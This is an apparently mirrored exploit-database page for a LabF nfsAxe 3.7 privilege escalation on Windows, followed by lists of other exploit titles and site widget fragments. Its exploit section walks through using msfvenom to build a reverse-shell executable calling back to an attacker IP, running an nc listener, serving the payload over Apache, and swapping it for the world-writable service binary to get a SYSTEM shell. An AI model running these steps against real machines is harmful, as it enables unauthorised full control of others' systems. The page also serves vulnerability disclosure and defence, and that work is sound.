Menu

Search for hundreds of thousands of exploits

"LabF nfsAxe 3.7 - Privilege Escalation"

Author

Exploit author

bzyo

Platform

Exploit platform

windows

Release date

Exploit published date

2018-03-26

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
Exploit Author: bzyo
Twitter: @bzyo_
Exploit Title: LabF nfsAxe 3.7 - Privilege Escalation
Date: 03-24-2018
Vulnerable Software: LabF nfsAxe 3.7
Vendor Homepage: http://www.labf.com/
Version: 3.7
Software Link: http://www.labf.com/download/nfsaxe.exe
Tested On: Windows 7 x86 and x64 *Requires Windows 7 Public Sharing to be enabled


Details:
By default LabF nfsAxe 3.7 installs to "C:\Users\Public\Program Files\LabF.com\nfsAxe" and installs
a service called "XwpXSetSrvnfsAxe service". To start this service an executable "xsetsrv.exe" 
is located in the same directory and also runs under Local System.

By default in Windows with Public Folder sharing enabled, the permissions on any file/folder under "C:\Users\Public\" is Full Control
for Everyone.  This means unprivileged users have the ability to add, delete, or modify any and all 
files/folders.


Exploit:
1. Generate malicious .exe on attacking machine
  msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.0.149 LPORT=443 -f exe > /var/www/html/xsetsrv.exe

2. Setup listener and start apache on attacking machine
  nc -nlvvp 443
  service apache2 start
 
3. Download malicious .exe on victim machine
  Open browser to http://192.168.0.149/xsetsrv.exe and download

4. Rename C:\Users\Public\Program Files\LabF.com\nfsAxe\xsetsrv.exe
   xsetsrv.exe > xsetsrv.bak
 
5. Copy/Move downloaded xsetsrv.exe file to C:\Users\Public\Program Files\LabF.com\nfsAxe\

6. Restart victim machine and login as unprivileged user 

7. Reverse Shell on attacking machine opens
	C:\Windows\system32>whoami
	whoami
	nt authority\system

Prerequisites:
To successfully exploit this vulnerability, an attacker must already have access
to a system running a LabF nfsAxe installed at the default location using a
low-privileged user account

Risk:
The vulnerability allows local attackers to escalate privileges and execute
arbitrary code as Local System aka Game Over.

Fix:
Don't use default install path
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2020-10-12 "MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated)" webapps php bzyo
2020-10-02 "MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated)" webapps php bzyo
2020-04-20 "Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)" local windows bzyo
2019-05-17 "Iperius Backup 6.1.0 - Privilege Escalation" local windows bzyo
2019-05-06 "NSClient++ 0.5.2.35 - Privilege Escalation" local windows bzyo
2019-02-14 "exacqVision ESM 5.12.2 - Privilege Escalation" local windows bzyo
2019-01-30 "10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)" local windows bzyo
2019-01-28 "Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)" local windows bzyo
2019-01-11 "Code Blocks 17.12 - Local Buffer Overflow (SEH) (Unicode)" local windows bzyo
2019-01-10 "RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)" local windows bzyo
2018-12-27 "Iperius Backup 5.8.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "MAGIX Music Editor 3.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-20 "Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)" local windows bzyo
2018-12-20 "LanSpy 2.0.1.159 - Buffer Overflow (SEH) (Egghunter)" local windows_x86 bzyo
2018-12-11 "PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion" webapps multiple bzyo
2018-09-12 "SynaMan 4.0 build 1488 - SMTP Credential Disclosure" webapps windows bzyo
2018-09-12 "SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS)" webapps windows bzyo
2018-08-06 "AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH)" local windows bzyo
2018-07-23 "Splinterware System Scheduler Pro 5.12 - Privilege Escalation" local windows bzyo
2018-07-23 "Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)" local windows bzyo
2018-05-06 "HWiNFO 5.82-3410 - Denial of Service" dos windows bzyo
2018-04-24 "RGui 3.4.4 - Local Buffer Overflow" local windows bzyo
2018-04-18 "Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities" webapps xml bzyo
2018-04-17 "Reaper 5.78 - Local Buffer Overflow" local windows bzyo
2018-04-09 "GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)" local windows bzyo
2018-04-02 "WebLog Expert Enterprise 9.4 - Privilege Escalation" local windows bzyo
2018-03-26 "LabF nfsAxe 3.7 - Privilege Escalation" local windows bzyo
2018-03-23 "WM Recorder 16.8.1 - Denial of Service" dos windows bzyo
2018-03-05 "Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow" local windows bzyo 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected